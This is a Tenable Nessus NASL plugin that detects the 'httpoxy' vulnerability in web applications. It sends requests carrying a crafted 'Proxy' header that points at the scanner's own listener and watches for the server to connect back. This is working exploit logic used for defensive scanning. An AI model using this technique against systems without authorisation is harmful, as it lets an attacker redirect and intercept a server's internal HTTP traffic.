code | #TRUSTED 7757ccc72c699faa2ffe9c4f53351ac4d80c4f292d805afa8fa959ac86adc1762d562e16fab11ec1c3ff2ec027c796ae1ae5ed062ea6900564a5cf9a7288adbbb6b9ec40295c81afb7810ecb667c55a0c16df845929d5127921d47071b6336f0a800a7e9e68f1953f750e12ec632198a5c923ad8933d507d85ce908845ef0b1c3e89e3150bf4a974352c465c88a0d34ead7741fef1cadcd8933a69108b202a418b934c032e82288550d8f91d178195c2aae763c68cf88085cab9cb8caf53082c99115ce156621b1605b4a4d31f2eceddf63f426b9c0450b348cd39cabf41c7d7bcfa0cd767f67bb82c0702c663df388eface6b8c2f7e9205c373d5505cdd44a3d30c71e6f4be459ee810cd07f1a8aac02d9c4f64e583c780313df4cadc99f4dad8450d96a05e295ede51b3d312072e29659f489d95fd639beb692f68a792be15028bf83193cb8cd2f23da0d5f6e58ddc512424b35629dbb316013edecd92a8639ce3f53795a555e24b6c005c5e52e38949f143ccf6adc71297aad9402441615920c5f80b3fa1346a93ff5e861f68bffde7edcf6015853a286ceafef4e1a4ba645d983e69df0e6dd787af4139233443f13f683b6dd7fb95cd74b848223e9dddcabaa1950b27ec5efc0db4ee45533db392681bc95a50424c7a55b9c845e2d718539a3459b1f9eead7fb59041798d00f8c83a8f7ea4f9f10e240d3a28e28b2f0f15
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(92539);
script_version("1.12");
script_cvs_date("Date: 2019/11/19");
script_cve_id(
"CVE-2016-5385",
"CVE-2016-5386",
"CVE-2016-5387",
"CVE-2016-5388",
"CVE-2016-1000109",
"CVE-2016-1000110"
);
script_bugtraq_id(
91815,
91816,
91818,
91821
);
script_xref(name:"CERT", value:"797896");
script_name(english:"HTTP_PROXY Environment Variable Namespace Collision Vulnerability (httpoxy)");
script_summary(english:"Checks if the web application responds to a crafted Proxy header in an HTTP request.");
script_set_attribute(attribute:"synopsis", value:
"The remote web application is affected by a man-in-the-middle
vulnerability.");
script_set_attribute(attribute:"description", value:
"The web application running on the remote web server is affected by a
man-in-the-middle vulnerability known as 'httpoxy' due to a failure to
properly resolve namespace conflicts in accordance with RFC 3875
section 4.1.18. The HTTP_PROXY environment variable is set based on
untrusted user data in the 'Proxy' header of HTTP requests. The
HTTP_PROXY environment variable is used by some web client libraries
to specify a remote proxy server. An unauthenticated, remote attacker
can exploit this, via a crafted 'Proxy' header in an HTTP request, to
redirect an application's internal HTTP traffic to an arbitrary proxy
server where it may be observed or manipulated.");
script_set_attribute(attribute:"see_also", value:"https://httpoxy.org/");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/oss-sec/2016/q3/94");
script_set_attribute(attribute:"solution", value:
"Applicable libraries and products should be updated to address this
vulnerability. Please consult the library or product vendor for
available updates.
If updating the libraries and products is not an option, or if updates
are unavailable, filter 'Proxy' request headers on all inbound
requests.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-5386");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"in_the_news", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/07/18");
script_set_attribute(attribute:"patch_publication_date", value:"2016/07/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/07/25");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
script_set_attribute(attribute:"cpe", value:"cpe:/a:golang:go");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:http_server");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:tomcat");
script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:drupal");
script_set_attribute(attribute:"cpe", value:"cpe:/a:python:python");
script_set_attribute(attribute:"cpe", value:"cpe:/a:facebook:hiphop_virtual_machine");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("webmirror.nasl");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("audit.inc");
include("http.inc");
port = get_http_port(default: 80);
urls = make_list();
# Fix for webmirror_uri "no such table" errors
table = query_scratchpad("SELECT name FROM sqlite_master where type = 'table' and name = 'webmirror_uri'");
if (empty_or_null(table)) exit(1, "Unable to obtain webmirror_uri table from webmirror crawl.");
# Query Scratchpad for webmirror results with a status code of 200
# and load results into urls list
res = query_scratchpad("SELECT DISTINCT uri FROM webmirror_uri WHERE port = ? AND status_code = 200 ORDER BY uri ASC", port);
if (empty_or_null(res)) exit(1, 'Unable to obtain crawled URIs from webmirror scratchpad.');
# Loop through filters to discard URLs we don't care about testing
i = 0;
foreach url (res)
{
if (
# Filter out Apache directory listings page sorting
url['uri'] !~ "/\?[CO]\=[NDMSA](%|$)" &&
# Filter out static text files
url['uri'] !~ "\.(md|js|css|scss|txt|csv|xml)($|\?)" &&
# Filter out image files
url['uri'] !~ "\.(gif|jpeg|jpg|png|svg|ttf|eot|woff|ico)($|\?)" &&
# Filter out binary files
url['uri'] !~ "\.(exe|zip|gz|tar)($|\?)" &&
# Filter out document files
url['uri'] !~ "\.(rtf|doc|docx|pdf|xls|xlt)($|\?)"
)
{
# Strip any trailing args from URLs to get the url count down
if ("?" >< url['uri'])
url['uri'] = ereg_replace(pattern:"(.*)\?.*", replace:"\1", string:url['uri']);
urls = make_list(urls, url['uri']);
i++;
}
# If thorough_tests is not enabled, stop at 10 urls
if (!thorough_tests && i > 10) break;
}
# If we have no URLs to check, bail out
if (empty_or_null(urls))
audit(AUDIT_WEB_FILES_NOT, "dynamic content", port);
urls = list_uniq(urls);
scanner_ip = compat::this_host();
target_ip = get_host_ip();
pat = "HTTP/1\.(0|1)";
vuln = FALSE;
foreach url (urls)
{
# If we get an empty url string, just go to the next
if(empty_or_null(url)) continue;
listener = bind_sock_tcp();
if (!listener) audit(AUDIT_SOCK_FAIL, 'tcp', 'unknown');
s_port = listener[1];
s = listener[0];
# Exploit is scanner's IP and our listener's socket in the Proxy header
exploit = scanner_ip + ':' + s_port;
v = http_mk_get_req(port: port, item: url, add_headers: make_array("Proxy", exploit));
req = http_mk_buffer_from_req(req: v);
# We don't need to check the response we get back from the request's socket
req = http_send_recv_buf(port:port, data:req);
# When we have a successful attack, we won't get a response returned
# to req, since the proxied request causes the server-side script to
# pause execution and timeout without a response. Since we check for
# NULL here, we can bypass the listener socket timeout for non-vuln
# URLs to process through the URL queue faster.
if(isnull(req))
{
# Instead we're more interested in if we get data on the listener socket
soc = sock_accept(socket:s, timeout:3);
res = recv(socket:soc, length:1024, timeout:3);
close(s);
}
else
{
res = NULL;
close(s);
}
if (!empty_or_null(res) && (res =~ pat))
{
vuln = TRUE;
report = '\nThe full request used to detect this flaw was :\n\n' +
http_last_sent_request() +
'\n\nThe server sent back the following data to the listener on port ' + s_port + ':\n\n' +
res +
'\n';
}
# Stop after first vulnerable page is found
if (vuln) break;
}
if (vuln)
{
security_report_v4(
port : port,
severity : SECURITY_WARNING,
extra : report
);
exit(0);
}
audit(AUDIT_WEB_SERVER_NOT_AFFECTED, port);
|